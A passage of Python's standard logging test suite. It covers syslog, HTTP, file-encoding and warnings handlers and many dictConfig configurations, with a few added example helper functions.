@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
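# A minimal sketch, not part of the test suite: HTTPHandler, as exercised above,
# sends each record as url-encoded form data via GET or POST, optionally over TLS
# and with HTTP Basic credentials.  The host, path and credentials below are placeholders:
def _example_http_handler(host='logs.example.com:8080', url='/frob'):
    import logging
    import logging.handlers
    handler = logging.handlers.HTTPHandler(
        host, url,
        method='POST',                   # 'GET' is the default
        secure=False,                    # True (plus context=...) enables HTTPS
        credentials=('user', 'secret'),  # sent as a Basic authorization header
    )
    logger = logging.getLogger('example.http')
    logger.addHandler(handler)
    return logger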
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
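# A minimal sketch, not part of the test suite, of the behaviour MemoryTest checks:
# getLogger() always returns the same Logger object for a given name, with its
# configuration intact, even after all visible references to it are dropped.
def _example_logger_persistence():
    import logging
    logging.getLogger('example.persistent').setLevel(logging.DEBUG)
    # A later lookup by the same name yields the identical, still-DEBUG logger.
    assert logging.getLogger('example.persistent').level == logging.DEBUG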
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
        # A FileHandler opened with an explicit UTF-8 encoding must round-trip non-ASCII data.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
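# A minimal sketch, not part of the test suite: the encoding tests above depend on
# FileHandler honouring an explicit ``encoding`` argument.  Writing non-ASCII text
# through a UTF-8 FileHandler to a temporary file (path chosen here) looks like this:
def _example_utf8_file_logger():
    import logging
    import os
    import tempfile
    fd, path = tempfile.mkstemp('.log')
    os.close(fd)
    handler = logging.FileHandler(path, encoding='utf-8')
    logger = logging.getLogger('example.utf8')
    logger.addHandler(handler)
    logger.warning('\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f')  # written as UTF-8
    logger.removeHandler(handler)
    handler.close()
    return path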
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
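# A minimal sketch, not part of the test suite: captureWarnings(True), which the
# WarningsTest above relies on, reroutes warnings.warn() output to the 'py.warnings'
# logger, so an ordinary handler can capture it:
def _example_capture_warnings():
    import io
    import logging
    import warnings
    stream = io.StringIO()
    handler = logging.StreamHandler(stream)
    logging.captureWarnings(True)
    try:
        logger = logging.getLogger('py.warnings')
        logger.addHandler(handler)
        with warnings.catch_warnings():
            warnings.simplefilter('always')
            warnings.warn('heads up')        # captured by the stream, not stderr
        logger.removeHandler(handler)
    finally:
        logging.captureWarnings(False)
        handler.close()
    return stream.getvalue()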
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
class myCustomFormatter:
def __init__(self, fmt, datefmt=None):
pass
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
    def test_config2_failure(self):
        # A config with a bogus handler stream ('ext://sys.stdbout') must fail to apply.
        self.assertRaises(Exception, self.apply_config, self.config2)
    def test_config2a_failure(self):
        # A config with a misspelt handler level ('NTOSET') must fail to apply.
        self.assertRaises(Exception, self.apply_config, self.config2a)
    def test_config2b_failure(self):
        # A config with a misspelt root level ('WRANING') must fail to apply.
        self.assertRaises(Exception, self.apply_config, self.config2b)
    def test_config3_failure(self):
        # A config referencing a non-existent formatter must fail to apply.
        self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
    # Same as test_config7_ok, but existing loggers are not disabled.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
